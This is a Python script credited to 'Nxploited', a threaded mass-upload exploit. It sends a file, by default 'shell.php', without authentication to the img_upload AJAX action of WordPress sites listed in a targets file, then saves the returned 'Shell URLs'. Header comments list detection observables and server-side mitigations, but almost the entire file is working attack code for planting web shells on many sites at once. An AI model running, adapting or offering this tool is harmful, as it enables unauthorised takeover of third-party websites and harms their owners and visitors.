# By: Nxploited
#
# What this file does, as visible in the code below: it reads a list of site
# URLs, and for each one sends a multipart POST to
# <site>/wp-admin/admin-ajax.php with the form field action=img_upload and a
# local file attached under the part name "files". No cookie, nonce or
# authentication header is sent, so the script relies on the server-side
# handler for that action accepting uploads from unauthenticated clients.
# NOTE(review): the plugin or theme that registers the `img_upload` action is
# not identified anywhere on this page.
#
# Defender-relevant observables taken from the code:
#   * request path /wp-admin/admin-ajax.php, method POST, multipart body
#     containing action=img_upload and a file part named "files" declared as
#     application/octet-stream;
#   * a fixed desktop-Chrome User-Agent string (USER_AGENT below) -- a weak
#     indicator on its own, since it is a single constant;
#   * a JSON response with status == 1 and data.src, which the script treats
#     as the location of the stored file.
# Mitigation sits on the server side: the handler behind the action should
# require an authenticated session, a valid nonce and a capability check,
# restrict accepted file types, and the upload directory should not be
# allowed to execute scripts.
import threading
import requests
import time  # imported but not referenced in this file
import os
import sys
import json  # imported but not referenced in this file
import urllib3
from queue import Queue, Empty

from rich.console import Console
from rich.text import Text
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, TextColumn, TimeElapsedColumn
from rich import box
from rich.theme import Theme

# ===================== GLOBAL CONFIG =====================

# Silences the warning urllib3 emits for unverified HTTPS requests; the
# requests.post call in send_img_upload passes verify=False.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Presumably so that requests go direct instead of through any proxy
# configured in the environment -- confirm against the requests version in use.
os.environ["NO_PROXY"] = "*"

# Named rich styles used by every console.print / Text.append call below.
THEME = Theme(
    {
        "banner": "bold green",
        "subtitle": "bright_green",
        "accent": "bold bright_blue",
        "good": "bold bright_green",
        "bad": "bold bright_red",
        "muted": "dim white",
        "path": "bold bright_yellow",
        "url": "bold bright_cyan",
        "status": "bright_blue",
    }
)
console = Console(theme=THEME, force_terminal=True, color_system="truecolor")

# Sent unchanged on every request (see send_img_upload).
USER_AGENT = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/120.0.0.0 Safari/537.36"
)
REQUEST_TIMEOUT = 15  # passed as `timeout=` to requests.post
DEFAULT_WORKERS = 6  # thread count used when the prompt is left empty or invalid
OUTPUT_FILE = "uploaded_paths.txt"  # one returned `src` value appended per line

# Work queue shared by all worker threads; filled once in main().
queue_targets: "Queue[str]" = Queue()
# Run counters; every read and write below happens under stats_lock.
stats = {
    "total": 0,
    "done": 0,
    "ok": 0,
    "fail": 0,
}
stats_lock = threading.Lock()


# ===================== UI / BANNER =====================
def print_banner():
    """Print the ASCII-art banner and author contact lines inside a panel."""
    art = [
        " __ . ..___ _, _, _, ._, , ._, ._, ._, ",
        "/ `\\ /[__ ___ '_) |.| '_) (_ ___ /| |_ |_ |_ ",
        "\\__. \\/ [___ /_. |_| /_. (_) .|. ._) ._) ._) ",
        " ",
    ]
    text = Text()
    for line in art:
        text.append(line + "\n", style="banner")
    text.append("\n", style="banner")
    text.append("AuroraUpload | img_upload multi-target uploader\n", style="subtitle")
    text.append("By: Nxploited\n", style="accent")
    text.append("GitHub: https://github.com/Nxploited\n", style="muted")
    text.append("Telegram: @KNxploited | https://t.me/KNxploited\n", style="muted")
    console.print(
        Panel(
            text,
            box=box.ROUNDED,
            border_style="banner",
        )
    )


# ===================== INPUT / SETUP =====================
def prompt_config():
    """Prompt for the targets file, thread count and local file to send.

    Returns a (target_file, threads, payload_path) tuple. Exits the process
    with status 1 when the local file does not exist.
    """
    target_file = console.input(
        "[accent]Targets file (default: list.txt): [/]"
    ).strip() or "list.txt"
    threads_raw = console.input(
        f"[accent]Threads (default: {DEFAULT_WORKERS}): [/]"
    ).strip()
    # Any non-integer answer falls back to the default instead of failing.
    try:
        threads = int(threads_raw) if threads_raw else DEFAULT_WORKERS
    except Exception:
        threads = DEFAULT_WORKERS
    # Zero or negative values are clamped to a single worker.
    if threads < 1:
        threads = 1
    payload_name = console.input(
        "[accent]Local file to upload (e.g. shell.php): [/]"
    ).strip() or "shell.php"
    # Resolve payload path (relative to script directory)
    script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
    payload_path = os.path.join(script_dir, payload_name)
    if not os.path.exists(payload_path):
        console.print(
            Panel(
                Text(f"Local file not found: {payload_path}", style="bad"),
                border_style="bad",
                box=box.ROUNDED,
            )
        )
        sys.exit(1)
    return target_file, threads, payload_path


def load_targets(filename: str):
    """Read one URL per line from *filename* and return them as a list.

    Blank lines are skipped, entries without an http:// or https:// prefix get
    "http://" prepended, and trailing slashes are removed. Exits the process
    with status 1 when the file is missing or yields no entries.
    """
    if not os.path.exists(filename):
        console.print(
            Panel(
                Text(f"Targets file not found: {filename}", style="bad"),
                border_style="bad",
                box=box.ROUNDED,
            )
        )
        sys.exit(1)
    targets = []
    # errors="ignore" drops bytes that are not valid UTF-8 instead of raising.
    with open(filename, "r", encoding="utf-8", errors="ignore") as f:
        for line in f:
            url = line.strip()
            if not url:
                continue
            if not url.lower().startswith(("http://", "https://")):
                url = "http://" + url
            targets.append(url.rstrip("/"))
    if not targets:
        console.print(
            Panel(
                Text("No targets found in list file.", style="bad"),
                border_style="bad",
                box=box.ROUNDED,
            )
        )
        sys.exit(1)
    return targets


def write_shell_url(url: str):
    """Append *url* as one line to OUTPUT_FILE; write errors are ignored."""
    try:
        with open(OUTPUT_FILE, "a", encoding="utf-8", errors="ignore") as f:
            f.write(url.strip() + "\n")
    except Exception:
        # Silent fail for logging errors
        pass


# ===================== CORE LOGIC =====================
def build_ajax_url(base: str) -> str:
    """Return the admin-ajax.php endpoint URL under *base*."""
    return f"{base.rstrip('/')}/wp-admin/admin-ajax.php"


def send_img_upload(base: str, payload_path: str):
    """POST the file at *payload_path* to the img_upload AJAX action of *base*.

    The request is a multipart/form-data POST to
    <base>/wp-admin/admin-ajax.php with the form field action=img_upload and
    one file part named "files" (original basename, declared as
    application/octet-stream). Only a User-Agent header is set; no cookie,
    nonce or other credential is sent, and TLS certificate verification is
    turned off.

    Returns (True, src) when the response is a JSON object with status == 1
    and a non-empty data.src, otherwise (False, reason) where reason is an
    error tag or the first 200 characters of the response body.
    """
    url = build_ajax_url(base)
    try:
        with open(payload_path, "rb") as fh:
            files = {
                "files": (os.path.basename(payload_path), fh, "application/octet-stream"),
            }
            data = {
                "action": "img_upload",
            }
            resp = requests.post(
                url,
                data=data,
                files=files,
                headers={"User-Agent": USER_AGENT},
                timeout=REQUEST_TIMEOUT,
                verify=False,
            )
    except Exception as e:
        # Covers both a failure to open the local file and any requests error.
        return False, f"REQUEST_ERROR: {e}"
    body = resp.text.strip()
    # The HTTP status code is never inspected; only the JSON body decides.
    try:
        j = resp.json()
    except Exception:
        return False, f"JSON_PARSE_ERROR: {body[:200]}"
    if not isinstance(j, dict):
        return False, "JSON_NOT_OBJECT"
    status = j.get("status")
    data_obj = j.get("data") or {}
    src = None
    if isinstance(data_obj, dict):
        src = data_obj.get("src")
    # Strict comparison against the integer 1; a string "1" would not match.
    if status == 1 and src:
        # Undo JSON-style escaped slashes left in the returned path.
        # NOTE(review): a truthy non-string src would raise here; the caller
        # (worker_loop) catches that and counts the target as failed.
        src = src.replace("\\/", "/")
        return True, src
    return False, body[:200]


def print_success(site: str, shell_url: str):
    """Print a panel showing *site* and the URL returned for the stored file."""
    text = Text()
    text.append("Upload successful\n\n", style="good")
    text.append("Target: ", style="accent")
    text.append(site + "\n", style="url")
    text.append("Shell URL: ", style="accent")
    text.append(shell_url + "\n", style="path")
    console.print(
        Panel(
            text,
            title="[good]IMG_UPLOAD[/good]",
            border_style="good",
            box=box.ROUNDED,
        )
    )


def summarize():
    """Print a one-line done/total, OK and FAIL summary from `stats`."""
    # Snapshot the counters under the lock, then format outside it.
    with stats_lock:
        total = stats["total"]
        done = stats["done"]
        ok = stats["ok"]
        fail = stats["fail"]
    line = Text()
    line.append("Summary ", style="muted")
    line.append(f"{done}/{total} ", style="status")
    line.append("OK:", style="muted")
    line.append(f"{ok} ", style="good")
    line.append("FAIL:", style="muted")
    line.append(str(fail), style="bad")
    console.print(line)


# ===================== WORKER LOOP =====================
def worker_loop(payload_path: str, progress_task=None, progress: Progress | None = None):
    """Drain queue_targets, sending one upload request per queued site.

    Runs until the queue is empty. Each site is counted in `stats` as ok or
    fail, and the progress bar (when one is given) is advanced by one.
    """
    while True:
        # Non-blocking get: an empty queue ends this worker.
        try:
            site = queue_targets.get_nowait()
        except Empty:
            return
        base = site.rstrip("/")
        success = False
        info = ""
        try:
            ok, info = send_img_upload(base, payload_path)
            if ok:
                # On success `info` carries the data.src value from the response.
                shell_url = info
                write_shell_url(shell_url)
                print_success(base, shell_url)
                success = True
            else:
                console.print(f"[bad]FAIL[/bad] {base} -> {info}")
        except Exception as e:
            # Anything unexpected is reported and counted as a failure so the
            # thread keeps processing the remaining queue entries.
            info = str(e)
            console.print(f"[bad]ERROR[/bad] {base} -> {info}")
        with stats_lock:
            stats["done"] += 1
            if success:
                stats["ok"] += 1
            else:
                stats["fail"] += 1
        if progress and progress_task is not None:
            progress.update(progress_task, advance=1)
        queue_targets.task_done()


# ===================== MAIN =====================
def main():
    """Prompt for settings, queue every target, run the workers, print totals."""
    print_banner()
    targets_file, workers, payload_path = prompt_config()
    targets = load_targets(targets_file)
    for t in targets:
        queue_targets.put(t)
    with stats_lock:
        stats["total"] = len(targets)
        stats["done"] = 0
        stats["ok"] = 0
        stats["fail"] = 0
    console.print(
        f"[accent]Loaded[/accent] [path]{len(targets)}[/path] [accent]targets | Threads:[/] [path]{workers}[/path]"
    )
    console.print(f"[accent]Payload:[/] [path]{os.path.basename(payload_path)}[/path]\n")
    threads = []
    with Progress(
        SpinnerColumn(style="status"),
        TextColumn("[status]{task.description}"),
        TextColumn("{task.completed}/{task.total}"),
        TimeElapsedColumn(),
        console=console,
        transient=True,
    ) as progress:
        progress_task = progress.add_task("Uploading...", total=len(targets))
        # Never start more threads than there are queued targets.
        for _ in range(min(workers, len(targets))):
            t = threading.Thread(
                target=worker_loop,
                args=(payload_path, progress_task, progress),
                daemon=True,
            )
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
    console.print()
    summarize()
    console.print(
        Panel(
            Text(f"Shell URLs saved to {OUTPUT_FILE}", style="good"),
            border_style="good",
            box=box.ROUNDED,
        )
    )


if __name__ == "__main__":
    main()